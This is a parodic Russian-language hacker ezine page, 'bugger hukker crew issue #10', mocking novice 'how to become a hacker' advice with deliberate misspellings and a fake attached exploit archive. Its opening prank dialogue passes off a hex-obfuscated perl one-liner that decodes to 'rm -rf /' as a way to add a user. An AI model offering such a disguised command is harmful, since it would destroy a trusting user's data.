                                                               ▄▀ ░░ ▄▄▄▓▓▓▄    
                                                         ░░▀▄▄░▐█▄█▄█████████▓▄░
               ▄▄▄▓▓▀▀                                 ░▄█▓▄▀█▓▄▀██▓▀▀▀▀███████▓
           ▄▄█▓▓▓▀                                    ░████▓▓▄█▓▄█▓▄▄▄████▀█████
        ▄███▓▓▀                                     ░▄██▀▄███▓▀█▀█████████▓▀███▀
      ▄███▓▓▀                            ▄          ▐██▀█▀▐███▓▄███▓▀██████▓▀█▓ 
    ▄████▓▀                               ▀██▄▄     ░▐██▓ ▄▄ ▐█▓▀▀██▓▄▀█████▓▄█▓
   ▄████▓        bugger hukker crew        ▀████▄     ▀▐▌ ██▌█▄▓  ███▓ ▀██▀██▓▀█
  ▄████▓                                     █████     ░▀▄█████▄▓███▓▓ ▄▀▄ ▀██▓▄
 ▄████▓▌                                     ▐█████       ▄██▓▀▀░░ ▓▀ ▄▀▓▐▓░ ▀█▓
 █████▓  ░████▌      ░████▌       ░▄▄████▀▀▄  █████▌     ▀░▓▀   ▄███▄▀ ▄▐███▄ ░█
▐████▓▌  ▐████ ▄▄▄   ▐████        ▐█████      ▐█████      ▐███▄▄ ▀▀█▄▄██▓ ██▓▄ ░
▐████▓▌  ▐████  ▐███ ░████▀███▄▄ ░█████▌       █████▌   ░▄███▄▀▀██▄▐█████░ █▌▀▓▄
 ██████  ████▌   ███░████▌ ▐████▌░█████ ░███▌  ████▓▌  ▄████▄▀▀███████▀▄█▓░▐▓▄░▀
 ▀█████▌ ░▀▀▀▀▀████▀ ░▀▀▀  ▀█████▄░▀▀▀▀▀▀▀▀▀  ▐████▓   ▀▀█▄▀██████▓▓████▓  ░█▓▄░
  ▀█████                                      ████▓▌     ▐▀██████▓▓▓▓▀▐█▓  ▄██▓▓
   ▀█████                                    ▐████▓      ▀▀▄▀▓████▓▀▄▄█▓▄▀▄█████
    ▀█████            issue #10              ███▓▓       ▀▄▄▀▄▀███████▀▄▓▓█████▓
      ▀████▄                                ███▓▀        ░▄▄▄▄██▀ ███▓▀█  ▀▓▓▓▓▓
        ▀█████▄                           ▄█▓▓▀           █████ ▄██▓▓▀▓▓▄ ██▌▓▓▓
           ▀▀████▄                      ▄▓▀▀               ▀▀▀▀▀░░░ ▄▓██▓▓▀ ▄▀ ▀
               ▀▀▀██▄▄                                              ▀█▓▓▓▀▄██▌█▓
                                                                     ░▓▀▄██▀▄▓▀ 
                                                                    ░█ ██▀▄█▓▀ ▄
                                                                    ▐▌ ███▓▓▀▀▄▓
░▄▄▓▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄        ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█▄██████▄▄▄▄
▄█▓  ▄   ▄▄                                                           ░▄▄▄  ███
░▀█▓▄ ▀ ░█                    Как стать хэкером!                         ▓░ ▓▓█
  ░██▓▄░ ▓▄                         0чCAFE                             ▄▓▓  ▒▒▓
 ▄■ ██▓▌ ░░                                                                 ░░▒
▀▄▄███▀ ▄▀                                                                    ░
 ░▀▓▓
          - Ты пользователья хочешь добавить?                               ░░
 ▄▀▀▄▄ ░  - да                                                              ▒▒░
■   ░▀▓▄  - перловый скрипт выполни такой                                   ▓▓▒
· ▄▀■░██▓   perl -e 'print "\x72\x6d\x20\x2d\x72\x66\x20\x2f\x0a"'`         ██▓
░▐▓▄▄██▓░   меню настройки выйдет.                                          ███
  ▀█▓▓▀░                                                                    ███
 ▀▄       - у  меня  теперь  шелл не открывается :(.когда путти загружаю он ███
 ▐▓▀▄░░     вылетает даже не дает логин написать.                           ███
░▐ ██▀▓                                                                     ███
░▐ █ ██░  - >:(                                                             ▓██
 ▐░█ █▓                                                                     ▒▓▓
   ▓ ▓▒                                                                     ░▒▒
   ▒ ▒░   В  первую  очередь тебе понадобится Ленукс!Ленукс - это бесплотно  ░░
   ░ ░    распростро- няемая системма.Ты можешь изучить исходник и напесать  ▓░
          и  скомпелировать  свой сплоет,ктоторый будут использовать другие  ░░
 ▄▀▀▄▄ ░  хэкеры  против  не  хэкеров.В линуксе легче делать ДЕФЕЙС так как ▒▒░
■   ░▀▓▄  все   средства   необходимые  для  слома  под  рукой.  Существует ▓▓▒
· ▄▀■░██▓ несколько  разновидностей  Ленукса:  РетХад,  Мандараком, ЕбанТЫ, ██▓
░▐▓▄▄██▓░ СакиВаря,  Дерьбиян.  В интернете на большенстве компютеров стоит ███
  ▀█▓▓▀░  ленукс  следовательно  зная его ты сможешь совершить ДЕФЕЙС!!!Для ███
 ▀▄       успешного   взлома   тебе   понадобится   сплоет,  или  несколько ███
 ▐▓▀▄░░   сплоетов.Их   необходимо  будет  ПРОКОМПИЛИРОВАТЬ  об  этом  было ███
░▐ ██▀▓   написано  в  предыдущих  сериях  журнала.  Также тебе понадобится ███
░▐ █ ██░  скомпелить  ПРОКСИ!Чтобы  злые  дядьки из ФБР не вломились в твою ▓██
 ▐░█ █▓   комноту.После  использования  сплоита вместе с проксем необходимо ▒▓▓
   ▓ ▓▒   совершить  дефейс!Для  дефейса  тебе  может  понадобится  "сплоит ░▒▒
   ▒ ▒░   массовый  корневик для винды,ебущий TCP\IP порты" применяй его на  ░░
   ░ ░    свой страх и риск!!!.                                            
                                                                            ░░
 ▄▀▀▄▄ ░  Удачи хэкер                                                       ▒▒░
■   ░▀▓▄                                                                    ▓▓▒
· ▄▀■░██▓ прикреплён:сплоет массовый корневик для винды,ебущий TCP\IP порты ██▓
░▐▓▄▄██▓░             bhc-oddons/0day.tar.gz                                ███
  ▀█▓▓▀░                                                                    ███
░▄▄▓▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄        ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                            
